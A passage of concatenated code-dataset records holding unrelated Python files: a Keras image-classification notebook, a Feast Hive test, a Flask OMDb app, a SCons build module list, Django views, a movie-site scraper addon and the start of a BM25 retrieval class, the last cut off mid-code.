train_cat_fnames[pic_index-8:pic_index]]\nnext_dog_pic = [os.path.join(train_dogs_dir, fname) for fname in train_dog_fnames[pic_index-8:pic_index]]\nfor i, img_path in enumerate(next_cat_pic+next_dog_pic):\n s = plt.subplot(nrows, ncols, i+1)\n s.axis('Off')\n img = mpimg.imread(img_path)\n plt.imshow(img)\nplt.show()\n\n\n# In[14]:\n\n\n# Building The Model\n\n\n# In[15]:\n\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\n\n# In[16]:\n\n\nmodel = keras.models.Sequential([\n keras.layers.Conv2D(16, (3, 3), activation = 'relu', input_shape = (150, 150, 3)),\n keras.layers.MaxPooling2D(2, 2),\n keras.layers.Conv2D(32, (3, 3), activation = 'relu'),\n keras.layers.MaxPooling2D(2, 2),\n keras.layers.Conv2D(64, (3, 3), activation = 'relu'),\n keras.layers.MaxPooling2D(2, 2),\n keras.layers.Flatten(),\n keras.layers.Dense(512, activation = 'relu'),\n keras.layers.Dense(1, activation = 'sigmoid'),\n])\n\n\n# In[17]:\n\n\nmodel.summary()\n\n\n# In[18]:\n\n\nfrom tensorflow.keras.optimizers import RMSprop\n\n\n# In[19]:\n\n\nmodel.compile(optimizer = RMSprop(lr = 0.001),\n loss = 'binary_crossentropy',\n metrics = ['accuracy'],\n )\n\n\n# In[20]:\n\n\n# Setting up the DataGenerators\n\n\n# In[21]:\n\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n\n# In[22]:\n\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255)\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_dir,\n target_size = (150, 150),\n batch_size = 20,\n class_mode = 'binary',\n)\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_dir,\n target_size = (150, 150),\n batch_size = 20,\n class_mode = 'binary',\n)\n\n\n# In[23]:\n\n\nhistory = model.fit(\n train_generator,\n steps_per_epoch = 100,\n epochs = 15,\n validation_data = validation_generator,\n validation_steps = 50,\n verbose = 2,\n)\n\n\n# In[24]:\n\n\n# Evaluating The Model\n\n\n# In[25]:\n\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(len(acc))\nplt.plot(epochs, acc)\nplt.plot(epochs, val_acc)\nplt.title('The Training and The Validation Accuracy')\nplt.figure()\n\nplt.plot(epochs, loss)\nplt.plot(epochs, val_loss)\nplt.title('The Training and The Validation 
Loss')\nplt.show()\n\n\n# As we can see this model is overfitting to the training data. To solve this problem, we can use the data/image augmentation techniques like rotating the image by an angle or moving the object around the image, zooming in and out of the image.\n\n# In[26]:\n\n\ntrain_datagen_aug = ImageDataGenerator(\n rescale = 1./255,\n rotation_range = 40,\n width_shift_range = 0.2,\n height_shift_range = 0.2,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True,\n fill_mode = 'nearest'\n)\n\nvalidation_datagen_aug = ImageDataGenerator(\n rescale = 1./255,\n rotation_range = 40,\n width_shift_range = 0.2,\n height_shift_range = 0.2,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True,\n fill_mode = 'nearest'\n)\n\ntrain_generator_aug = train_datagen_aug.flow_from_directory(\n train_dir,\n target_size = (150, 150),\n batch_size = 20,\n class_mode = 'binary',\n)\n\nvalidation_generator_aug = validation_datagen_aug.flow_from_directory(\n validation_dir,\n target_size = (150, 150),\n batch_size = 20,\n class_mode = 'binary',\n)\n\n\n# In[ ]:\n\n\nhistory_aug = model.fit(\n train_generator_aug,\n steps_per_epoch = 100,\n epochs = 15,\n validation_data = validation_generator_aug,\n validation_steps = 50,\n verbose = 2,\n)\n\n\n# Now we will plot the graph.\n\n# In[ ]:\n\n\nacc = history_aug.history['accuracy']\nvalidation_acc = history_aug.history['val_accuracy']\nloss = history_aug.history['loss']\nvalidation_loss = history_aug.history['val_loss']\n\nepochs = range(len(acc))\nplt.plot(epochs, acc, 'bo', label=\"Training Accuracy\")\nplt.plot(epochs, validation_acc, 'b', label=\"Validation Accuracy\")\nplt.title(\"Training Vs Validation Accuracy\")\nplt.figure()\nplt.plot(epochs, loss, 'bo', label=\"Training Loss\")\nplt.plot(epochs, validation_loss, 'b', label=\"Validation Loss\")\nplt.title(\"Training Vs Validation Loss\")\nplt.show()\n\n\n# This fixes the overfitting problem to some extent.\n\n# In[ ]:\n\n\n# Now implementing Transfer Learning\n\n\n# In[ ]:\n\n\nimport os\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3\n\n\n# In[ ]:\n\n\nget_ipython().system('wget --no-check-certificate https://storage.googleapis.com/mledu-datasets/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5 -O /tmp/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5')\n\n\n# In[ ]:\n\n\nlocal_weights_file = '/tmp/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5'\n\n\n# In[ ]:\n\n\npre_trained_model = InceptionV3(input_shape = (150, 150, 3), include_top = False, weights = None)\npre_trained_model.load_weights(local_weights_file)\nfor layer in pre_trained_model.layers:\n layer.trainable = False\n\n\n# In[ ]:\n\n\npre_trained_model.summary()\n\n\n# In[ ]:\n\n\nlast_layer = pre_trained_model.get_layer('mixed7')\nlast_output = last_layer.output\n\n\n# In[ ]:\n\n\nfrom tensorflow.keras.optimizers import RMSprop\n\n\n# In[ ]:\n\n\nx = layers.Flatten()(last_output)\nx = layers.Dense(1024, activation = 'relu')(x)\nx = layers.Dense(1, activation = 'sigmoid')(x)\n\n\n# In[ ]:\n\n\nmodel = Model(pre_trained_model.input, x)\nmodel.compile(\n optimizer = RMSprop(lr = 0.001),\n loss = 'binary_crossentropy',\n metrics = ['accuracy']\n)\n\n\n# In[ ]:\n\n\nhistory_transfer = model.fit_generator(\n train_generator_aug,\n validation_data = validation_generator_aug,\n steps_per_epoch = 100,\n epochs = 20,\n validation_steps = 50,\n verbose = 2,\n)\n\n\n# In[ ]:\n\n\n# Now we will plot the 
graphs\n\n\n# In[ ]:\n\n\nacc = history_transfer.history['accuracy']\nvalidation_acc = history_transfer.history['val_accuracy']\nloss = history_transfer.history['loss']\nvalidation_loss = history_transfer.history['val_loss']\n\nepochs = range(len(acc))\nplt.plot(epochs, acc, 'bo', label='Training Accuracy')\nplt.plot(epochs, validation_acc, 'b', label='Validation Accuracy')\nplt.title('Training Vs Validation Accuracy')\nplt.figure()\n\nplt.plot(epochs, loss, 'bo', label='Training Loss')\nplt.plot(epochs, validation_loss, 'b', label='Validation Loss')\nplt.title(\"Training Vs Validation Loss\")\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Cats_Vs_Dogs-Copy1.py","file_name":"Cats_Vs_Dogs-Copy1.py","file_ext":"py","file_size_in_byte":7929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"1037992","text":"import os\nimport random\nimport sys\nimport time\nfrom datetime import datetime\n\nimport pytest\nfrom feast.infra.offline_stores import offline_utils\n\nfrom impala.dbapi import connect\n\nfrom feast_hive import offline_store, HiveOfflineStoreConfig\nfrom tests.helper import generate_entities, get_hive_cursor, with_cursor\n\n\n# @with_cursor\n# def test_upload_entity_df(cursor):\n#     start_date = datetime.now().replace(microsecond=0, second=0, minute=0)\n#     (_, _, _, entity_df, _,) = generate_entities(start_date, False)\n\n#     # Test upload entity_df to Hive\n#     table_name_1 = offline_utils.get_temp_entity_table_name()\n#     schema_1 = offline_store._upload_entity_df_and_get_entity_schema(\n#         table_name_1, entity_df, cursor\n#     )\n#     cursor.execute_async(f\"SELECT * FROM {table_name_1}\")\n#     new_entity_df_1 = offline_store.HiveRetrievalJob(cursor).to_df()\n#     assert len(entity_df) == len(new_entity_df_1)\n\n#     # Test upload by Query\n#     table_name_2 = offline_utils.get_temp_entity_table_name()\n#     schema_2 = offline_store._upload_entity_df_and_get_entity_schema(\n#         table_name_2, f\"SELECT * FROM {table_name_1}\", cursor\n#     )\n#     cursor.execute_async(f\"SELECT * FROM {table_name_2}\")\n#     new_entity_df_2 = offline_store.HiveRetrievalJob(cursor).to_df()\n#     assert new_entity_df_2.equals(new_entity_df_1)\n\n\n@pytest.mark.parametrize(\n    \"provider_type\", [\"local\"],\n)\n@pytest.mark.parametrize(\n    \"infer_event_timestamp_col\", [False, True],\n)\n@pytest.mark.parametrize(\n    \"full_feature_names\", [False, True],\n)\ndef test_historical_features_from_hive_sources(\n    provider_type, infer_event_timestamp_col, capsys, full_feature_names, pytestconfig\n):\n    hive_offline_store = HiveOfflineStoreConfig(\n        host=pytestconfig.getoption(\"hive_host\"),\n        port=int(pytestconfig.getoption(\"hive_port\")),\n    )\n\n    start_date = datetime.now().replace(microsecond=0, second=0, minute=0)\n    (\n        customer_entities,\n        driver_entities,\n        end_date,\n        orders_df,\n        start_date,\n    ) = generate_entities(start_date, infer_event_timestamp_col)\n\n    table_prefix = (\n        f\"test_hist_retrieval_{int(time.time_ns())}_{random.randint(1000, 9999)}\"\n    )\n\n    # Stage orders_df to Hive, mirroring the commented-out upload test above\n    # (get_hive_cursor comes from tests.helper; passing it the store config is an assumption)\n    table_name = f\"{table_prefix}_orders\"\n    entity_df_query = f\"SELECT * FROM {table_name}\"\n    cursor = get_hive_cursor(hive_offline_store)\n    schema_1 = offline_store._upload_entity_df_and_get_entity_schema(\n        table_name, orders_df, cursor\n    )\n","sub_path":"tests/test_hive_offline_store.py","file_name":"test_hive_offline_store.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
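The test reads --hive_host and --hive_port through pytestconfig.getoption; a plausible conftest.py declaration for those options (option names taken from the test itself, defaults are assumptions):

```python
# conftest.py sketch: register the custom CLI options the test suite reads
def pytest_addoption(parser):
    parser.addoption("--hive_host", action="store", default="localhost")
    parser.addoption("--hive_port", action="store", default="10000")
```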
)\n","sub_path":"tests/test_hive_offline_store.py","file_name":"test_hive_offline_store.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"341881201","text":"##\n# Homework project: task 5 for week 3 (see for details, see ../../homework.md)\n# Note:\n# The purpose of this exercise is to get introduced to the requests module\n# So I am removing all bokeh- and database-related code\n#\nfrom flask import Flask, render_template\nfrom flask import jsonify\nimport requests\n\nBASE = 'http://www.omdbapi.com/?t={0}&y=&plot=short&r=json'\n\napp = Flask(__name__)\n\n##\n# Hello world sanity check\n#\n@app.route(\"/\")\ndef hello():\n return 'Hello'\n\n##\n# Code copy-and-pasted from the Real Python version in rp_app.py\n# Except: I am adding a route....\n#\n@app.route('/find_movie')\ndef index():\n movie_name = 'star wars'\n url = BASE.format(movie_name)\n r = requests.get(url)\n json_response = r.json()\n print(json_response)\n return jsonify(json_response)\n\n##\n# \"fm\" is lazy-typists speak for Find Movie\n#\n@app.route( '/fm' )\ndef fm():\n print( 'No movie_name specified (in the \"/fm\" route)')\n movie_name = 'silence%20of%20the%20lambs'\n return find_movie( movie_name )\n\n##\n# Version of \"fm\" route that accepts a movie_name\n#\n@app.route( '/fm/' )\ndef fm_param( movie_name ):\n print( 'movie_name:', movie_name )\n if movie_name == '': ## I believe this is unnecessary\n movie_name = 'american gangster' ## and perhaps overly-paranoid\n return find_movie( movie_name )\n\n##\n# Shared subroutine to find the movie\n#\nFORMAT_THE_JSON = False\n## FORMAT_THE_JSON = True\ndef find_movie( movie_name ):\n url = BASE.format(movie_name)\n response = requests.get(url)\n json_response = response.json()\n jsonified_response = jsonify(json_response)\n print( 'json_response:', json_response )\n print( 'jsonified_response:', jsonified_response )\n if FORMAT_THE_JSON :\n return jsonified_response\n else:\n return render_template( 'json.html', json_response=json_response )\n\n##\n# Run the app!\n#\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"08-real_python_class/2017_02_21-Lesson_3/homework/5-omdb_api/project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"214312134","text":"import os\n\n\nclass Module:\n \"\"\"Represents a module of the code with its names, its list of sources\n its #ifdef macro and a list of other modules it depends on\n \"\"\"\n def __init__(self, name,\n sources=[],\n macro=\"\",\n win32_sources=[],\n linux_sources=[],\n dependencies=[]):\n self.name = name\n self.sources = sources\n self.macro = macro\n self.win32_sources = win32_sources\n self.linux_sources = linux_sources\n self.dependencies = dependencies\n\n def add(self, sources, env, deps=[], check=True):\n \"\"\"Addition of a module's sources including\n additional check for dependencies and\n recursive addition of said dependencies\n\n -sources: The list of sources for compilation\n -env: The Scons environment\n -deps: A list of current modules to build -- helps in\n avoiding duplication\n -check: A flag to determine whether we should check for\n dependencies or not\n \"\"\"\n env.Append(CPPDEFINES={self.macro: None})\n sources.extend(self.sources)\n if(env['TARGET_SYSTEM'] == 'Windows'):\n sources.extend(self.win32_sources)\n else:\n sources.extend(self.linux_sources)\n if check:\n needed = 
set(self.dependencies)-set(deps)\n for m in modules:\n if m.name in needed:\n deps.append(m.name)\n m.add(sources, env, deps, True)\n\n\n# empty list of modules and sources\nsources = []\nmodules = []\n\n# add all the modules one by one\nmodules.append(\n Module(\"CORE\",\n ['refu.c',\n 'Utils/endianess.c',\n 'Utils/log.c',\n 'Utils/math.c',\n 'Persistent/buffers.c',\n 'Utils/buffer.c',\n 'Utils/array.c',\n 'Utils/rf_unicode.c',\n 'Utils/hash.c',\n 'Numeric/Integer/conversion.c'])\n)\n\nmodules.append(\n Module(\"STRING\",\n ['String/rf_str_common.c', 'String/rf_str_commonp.c',\n 'String/rf_str_conversion.c',\n 'String/rf_str_conversionp.c',\n 'String/rf_str_core.c', 'String/rf_str_corex.c',\n 'String/rf_str_files.c',\n 'String/rf_str_filesx.c', 'String/rf_str_module.c',\n 'String/rf_str_manipulation.c',\n 'String/rf_str_manipulationx.c', 'String/rf_str_retrieval.c',\n 'String/rf_str_traversalx.c'],\n macro=\"RF_MODULE_STRINGS\",\n dependencies=['IO'])\n)\n\nmodules.append(\n Module(\"PARALLEL\",\n ['Parallel/rf_threading.c'],\n win32_sources=[''],\n linux_sources=['Parallel/rf_worker_pool_linux.c',\n 'Parallel/rf_threading_linux.c'],\n macro=\"RF_MODULE_PARALLEL\",\n dependencies=[\"INTRUSIVE_LIST\"])\n)\n\nmodules.append(\n Module(\"IO\",\n ['IO/rf_file.c'],\n macro=\"RF_MODULE_IO\",\n win32_sources=[],\n linux_sources=[])\n)\n\nmodules.append(\n Module(\"TEXTFILE\",\n ['IO/rf_textfile.c'],\n macro=\"RF_MODULE_IO_TEXTFILE\",\n dependencies=['STRING'])\n)\n\nmodules.append(\n Module(\"INTRUSIVE_LIST\",\n ['Data_Structures/intrusive_list.c'],\n macro=\"RF_MODULE_INTRUSIVE_LIST\")\n)\n\nmodules.append(\n Module(\"HTABLE\",\n ['Data_Structures/htable.c'],\n macro=\"RF_MODULE_HTABLE\")\n)\n\nmodules.append(\n Module(\"MEMORY_POOL\",\n ['Utils/fixed_memory_pool.c'],\n macro=\"RF_MODULE_MEMORY_POOL\")\n)\n\nmodules.append(\n Module(\"BINARY_ARRAY\",\n ['Data_Structures/binaryarray.c'],\n macro=\"RF_MODULE_BINARYARRAY\")\n)\n\nmodules.append(\n Module(\"TIME\",\n win32_sources=['Time/time_win32.c'],\n linux_sources=['Time/time_linux.c'],\n macro=\"RF_MODULE_TIME_TIMER\")\n)\n\nmodules.append(\n Module(\"SYSTEM\",\n [],\n win32_sources=[\n 'System/rf_system_win32.c',\n 'System/rf_system_info_win32.c'\n ],\n linux_sources=[\n 'System/rf_system_linux.c',\n 'System/rf_system_info_linux.c'\n ],\n macro=\"RF_MODULE_SYSTEM\"))\n\n\nImport('local_env')\nenv = local_env\n\nif 'ALL' not in env['REFU_MODULES']:\n # add the core and system modules\n if 'CORE' not in env['REFU_MODULES']:\n env['REFU_MODULES'].append('CORE')\n if 'SYSTEM' not in env['REFU_MODULES']:\n env['REFU_MODULES'].append('SYSTEM')\n # make a copy of the dependencies\n deps = env['REFU_MODULES'][:]\n for mod in modules:\n if mod.name in env['REFU_MODULES']:\n mod.add(sources, env, deps)\nelse: # all modules requested\n for mod in modules:\n mod.add(sources, env, check=False)\n\nReturn('modules sources')\n","sub_path":"build_extra/clib/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"22889123","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom .models import Project\nfrom .forms import ProjectForm, ReviewForm\nfrom .utils import searchProjects, paginateProjects\n\n\ndef projects(request):\n projects, search = searchProjects(request)\n\n custom_range, projects = paginateProjects(request, projects, 3)\n 
\n    context = {'projects': projects, 'search':search, 'custom_range':custom_range}\n    return render(request, 'projects/projects.html', context)\n\n\ndef project(request, pk):\n    project = Project.objects.get(id=pk)\n    form = ReviewForm()\n\n    if request.method == 'POST':\n        form = ReviewForm(request.POST)\n        if form.is_valid():\n            review = form.save(commit=False)\n            review.project = project\n            review.owner = request.user.profile\n            review.save()\n\n            project.getVoteCount  # evaluated for its side effect (getVoteCount is a model property)\n\n            messages.success(request, 'Review submitted successfully')\n\n            return redirect('project', pk=project.id)\n\n    return render(request, 'projects/project.html', {'project': project, 'form':form})\n\n\n@login_required(login_url=\"login\")\ndef createProject(request):\n    page = 'create'\n    profile = request.user.profile\n    form = ProjectForm()\n\n    if request.method == 'POST':\n        form = ProjectForm(request.POST, request.FILES)\n        if form.is_valid():\n            # link the new project to the owner's profile before saving\n            project = form.save(commit=False)\n            project.owner = profile\n            project.save()\n            return redirect('projects')\n\n    context = {'form': form, 'page':page}\n    return render(request, 'projects/project_form.html', context)\n\n\n@login_required(login_url=\"login\")\ndef updateProject(request, pk):\n    page = 'update'\n    profile = request.user.profile\n    project = profile.project_set.get(id=pk)\n    form = ProjectForm(instance=project)\n\n    if request.method == 'POST':\n        form = ProjectForm(request.POST, request.FILES, instance=project)\n        if form.is_valid():\n            form.save()\n            return redirect('projects')\n\n    context = {'form': form, 'page':page}\n    return render(request, 'projects/project_form.html', context)\n\n\n@login_required(login_url=\"login\")\ndef deleteProject(request, pk):\n    profile = request.user.profile\n    project = profile.project_set.get(id=pk)\n\n    if request.method == 'POST':\n        project.delete()\n        return redirect('projects')\n\n    context = {'object':project}\n    return render(request, 'delete_template.html', context)\n\n","sub_path":"projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
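The views above call a paginateProjects helper whose implementation is not shown; a plausible sketch based only on its call signature (request, queryset, results per page) and on the custom_range it returns:

```python
# Hypothetical implementation of the paginateProjects helper used above
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger

def paginateProjects(request, projects, results):
    page = request.GET.get('page', 1)
    paginator = Paginator(projects, results)
    try:
        projects = paginator.page(page)
    except PageNotAnInteger:
        projects = paginator.page(1)
    except EmptyPage:
        projects = paginator.page(paginator.num_pages)
    # window of page links around the current page
    left = max(int(projects.number) - 4, 1)
    right = min(int(projects.number) + 5, paginator.num_pages + 1)
    return range(left, right), projects
```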
{"seq_id":"421524946","text":"# -*- coding: UTF-8 -*-\nimport sys,re,os\nimport geturl as gethtml\nfrom geturl import PLchar as PLchar\n\nfrom cmf3 import parseDOM\nfrom cmf3 import replaceHTMLCodes\nfrom urllib.parse import parse_qs, quote, urlencode, quote_plus\nimport urllib.parse as urlparse\n\nfrom pprint import pprint\n\nUA = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0'\n\ndef ListContent(url,page):\n\t\n\tif '/page/' in url:\n\t\tnturl = re.sub('page\\/\\\\d+','page/%d'%(int(page)+1),url)\n\t\turl = re.sub('page\\/\\\\d+','page/%d'%int(page),url)\n\telse:\n\t\tnturl = url + 'page/%d' %(int(page)+1)\n\t\turl = url + 'page/%d' %int(page)\n\t\t\n\thtml,kuks = gethtml.getRequests(url)\n\tnpage=[]\n\tfout=[]\n\tsout=[]\n\t\n\ttry:\n\t\tpagination = parseDOM(html,'div', attrs={'class': \"pagination\"})[0]\n\t\tif pagination.find( '/page/%d' %(int(page)+1))>-1:\n\t\t\tnpage.append({'title':'Następna strona','url':nturl,'image':'','plot':'','page':int(page)+1})\n\texcept:\n\t\tpass\n\n\tresult = parseDOM(html,'div', attrs={'id': \"archive-content\"})\n\tresult =result[0] if result else html\n\tlinks = parseDOM(result,'article', attrs={'id': \"post\\-.+?\"})\n\t\n\tfor link in links:\n\t\thref = parseDOM(link, 'a', ret='href')[0]\n\t\timag = parseDOM(link, 'img', ret='src')[0]\n\t\ttry:\n\t\t\ttytul = (parseDOM(link, 'h4')[0]).strip(' ')\n\t\texcept:\n\t\t\ttytul = (parseDOM(link, 'h3')[0]).strip(' ')\n\t\t\n\t\tif '\\n' in tytul:\n\t\t\ttytul = (tytul.split('\\n')[0]).strip(' ')\n\t\topis = parseDOM(link,'div', attrs={'class': \"texto\"})\n\t\topis = opis[0] if opis else tytul\n\t\tgenre = re.findall('rel=\"tag\">([^>]+)<',link)\n\t\tkateg = ','.join([(x.strip()).lower() for x in genre]) if genre else ''\n\t\tmetad = parseDOM(link,'div', attrs={'class': \"metadata\"})\n\t\tjak = parseDOM(link,'span', attrs={'class': \"quality\"})\n\t\tjak = jak[0] if jak else ''\n\t\tif metad:\n\t\t\ttry:\n\t\t\t\tif'IMDb:' in metad[0]:\n\t\t\t\t\tif '/movies/' in \thref:\n\t\t\t\t\t\tif 'view' in metad[0]:\n\t\t\t\t\t\t\timdb,year,czas,wysw = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\timdb,year,czas = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tif 'view' in metad[0]:\n\t\t\t\t\t\t\timdb,year,wysw = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\timdb,year = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\telse:\n\t\t\t\t\tif '/movies/' in \thref:\n\t\t\t\t\t\tif 'view' in metad[0]:\n\t\t\t\t\t\t\tyear,czas,wysw = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tyear,czas = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tif 'view' in metad[0]:\n\t\t\t\t\t\t\tyear,wysw = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tyear = re.findall('>([^<]+)<\\/span>',metad[0])\n\t\t\texcept:\n\t\t\t\timdb=''\n\t\t\t\tyear=''\n\t\t\t\tczas=''\n\t\t\t\twysw=''\n\t\telse:\n\t\t\tyear=''\n\t\t\ttry:\n\t\t\t\tyear = re.findall('(.+?)<\\/span><\\/div>',link)[0]\n\t\t\texcept:\n\t\t\t\tyear = '' \n\t\t\timdb=''\n\t\t\tczas=''\n\t\t\twysw=''\n\t\tif '/movies/' in \thref:\n\t\t\tfout.append({'title':PLchar(tytul),'url':PLchar(href),'image':PLchar(imag),'plot':PLchar(opis),'year':year,'code':PLchar(jak),'genre':PLchar(kateg)})\t\n\t\telse:\n\t\t\tsout.append({'title':PLchar(tytul),'url':PLchar(href),'image':PLchar(imag),'plot':PLchar(opis),'year':year,'code':PLchar(jak),'genre':PLchar(kateg)})\n\n\treturn fout,sout,npage\n\ndef getVideo(url):\n\tout=[]\n\thtml,kuks = gethtml.getRequests(url)\n\tstream_url=''\n\t\n\tresult = parseDOM(html,'div', attrs={'id': \"playeroptions\"})\n\tif result:\n\t\tresult=result[0]\n\t\t# NOTE: the option-list selectors below assume the standard DooPlay theme markup\n\t\tvideos = re.findall(\"<li id='player-option.+?</li>\", result, re.S)\n\t\tfor vid in videos:\n\t\t\tdpost = re.findall(\"data-post='([^']+)'\",vid)[0]\n\t\t\tdnume = re.findall(\"data-nume='([^']+)'\",vid)[0]\n\t\t\tdtype = re.findall(\"data-type='([^']+)'\",vid)[0]\n
\ndef getVideo(url):\n\tout=[]\n\thtml,kuks = gethtml.getRequests(url)\n\tstream_url=''\n\t\n\tresult = parseDOM(html,'div', attrs={'id': \"playeroptions\"})\n\tif result:\n\t\tresult=result[0]\n\t\tvideos = re.findall("
([^<]+)<',vid)[0]\n\t\t\tdata = 'action=doo_player_ajax&post=%s&nume=%s&type=%s'%(dpost,dnume,dtype)\n\t\t\tout.append({'href':data,'host':host})\n\t\n\t\tif out:\n\t\t\tif len(out) > 100:\n\t\t\t\tu = [ x.get('href') for x in out]\n\t\t\t\th = [ x.get('host') for x in out]\n\t\t\t\tsel = gethtml.selectDialog(\"Źródło\", h)\n\t\t\t\tdata = out[sel].get('href') if sel>-1 else ''\n\t\t\telse:\n\t\t\t\tdata = out[0].get('href')\n\t\t\tif data:\n\t\t\t\theaders = {\n\t\t\t\t\t'User-Agent': UA,\n\t\t\t\t\t'Accept': '*/*',\n\t\t\t\t\t'Accept-Language': 'pl,en-US;q=0.7,en;q=0.3',\n\t\t\t\t\t'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n\t\t\t\t\t'X-Requested-With': 'XMLHttpRequest',\n\t\t\t\t\t'Origin': 'https://watch-movies.pl',\n\t\t\t\t\t'Connection': 'keep-alive',\n\t\t\t\t\t'Referer': url,\n\t\t\t\t\t'TE': 'Trailers',}\n\n\t\t\t\tposturl = 'https://watch-movies.pl/wp-admin/admin-ajax.php'\n\t\t\t\thtml,kuks = gethtml.getRequests(posturl,data=data,headers=headers)\n\t\t\t\tstream_url = parseDOM(html, 'iframe', ret='src')#[0] \n\t\t\t\tstream_url = stream_url[0] if stream_url else ''\n\t\t\telse:\n\t\t\t\treturn stream_url,'quit'\n\treturn stream_url,True\n\n\n# a, b, c = ListContent('https://watch-movies.pl/release/2020/page/1', 1)\n\n# vid, x = getVideo('https://watch-movies.pl/movies/upadek-grace/')\n# pprint(vid)\n","sub_path":"watchmovies2.py","file_name":"watchmovies2.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
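getVideo() above POSTs a form-encoded `doo_player_ajax` action to WordPress's admin-ajax endpoint with XHR headers, then pulls the stream URL out of the iframe in the reply. A standalone sketch of that exchange (not part of the addon) using the requests library instead of the geturl/gethtml helper; post_id, nume and dtype stand in for the data-post, data-nume and data-type attributes scraped from the player-option list items:

```python
# Sketch of the admin-ajax exchange performed by getVideo() above.
import re
import requests

def fetch_player_iframe(referer_url, post_id, nume, dtype):
    payload = {'action': 'doo_player_ajax', 'post': post_id,
               'nume': nume, 'type': dtype}
    headers = {'User-Agent': 'Mozilla/5.0',
               'X-Requested-With': 'XMLHttpRequest',
               'Origin': 'https://watch-movies.pl',
               'Referer': referer_url}
    resp = requests.post('https://watch-movies.pl/wp-admin/admin-ajax.php',
                         data=payload, headers=headers, timeout=15)
    resp.raise_for_status()
    # The endpoint replies with an HTML fragment whose iframe src is the stream URL.
    match = re.search(r'<iframe[^>]+src=[\'"]([^\'"]+)', resp.text)
    return match.group(1) if match else ''
```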
+{"seq_id":"320360293","text":"#!/usr/bin/env python\n# encoding:utf-8\n# -----------------------------------------#\n# Filename: bm25.py\n#\n# Description: BM25 similarity retrieval\n# Version: 1.0\n# Created: 2020/6/18 14:06\n# Author: chenxiang@myhexin.com\n# Company: www.iwencai.com\n#\n# -----------------------------------------#\n\nimport glob\nimport json\nimport time\n\nimport dill\n\nimport jieba\nimport re\nimport heapq\nimport os\nfrom gensim.summarization import bm25\n\n\nclass BM25Retrieval(object):\n    def __init__(self, corpus_file_pattern=None, stop_words_file=\"stop_words.txt\", MAX_LEN=300, path=\"./\"):\n \"\"\"\n BM25 retrieval module; mainly wraps the preprocessing steps around the bm25 library.\n :param corpus_file_pattern: retrieval corpus (text data) str\n :param stop_words_file: stop-word list str\n :param path: directory where the model is saved str\n \"\"\"\n os.makedirs(path, exist_ok=True)\n self.model = os.path.join(path, \"bm25.m\")\n self.sen = os.path.join(path, \"sen.pkl\")\n self.stop = os.path.join(path, \"stop.pkl\")\n self.MAX_LEN = MAX_LEN\n if os.path.isfile(self.model) and os.path.isfile(self.sen) and os.path.isfile(self.stop):\n self.load()\n else:\n assert corpus_file_pattern is not None, \"Can not find model or corpus file.\"\n if os.path.isfile(stop_words_file):\n self.stop_words = self.load_stop_words(stop_words_file)\n self.sentences, corpus = self.get_corpus(corpus_file_pattern)\n self.bm25 = bm25.BM25(corpus)\n self.dump()\n\n @staticmethod\n def load_stop_words(f=\"stop_words.txt\"):\n words = set()\n with open(f, \"r\", encoding=\"utf-8\") as fp:\n for line in fp:\n words.add(line.strip())\n return words\n\n def cut_and_stop(self, s):\n ws = jieba.cut(s) # tokenize\n ws = [x for x in ws if x not in self.stop_words] # remove stop words\n return ws\n\n @staticmethod\n def strQ2B(ustring):\n rstring = \"\"\n for uchar in ustring:\n inside_code = ord(uchar)\n # full-width character range\n if inside_code >= 0xFF01 and inside_code <= 0xFF5E:\n inside_code -= 0xfee0\n rstring += chr(inside_code)\n # special handling for full-width and non-breaking spaces\n elif inside_code == 0x3000 or inside_code == 0x00A0:\n inside_code = 0x0020\n rstring += chr(inside_code)\n else:\n rstring += uchar\n return rstring\n\n def get_corpus(self, 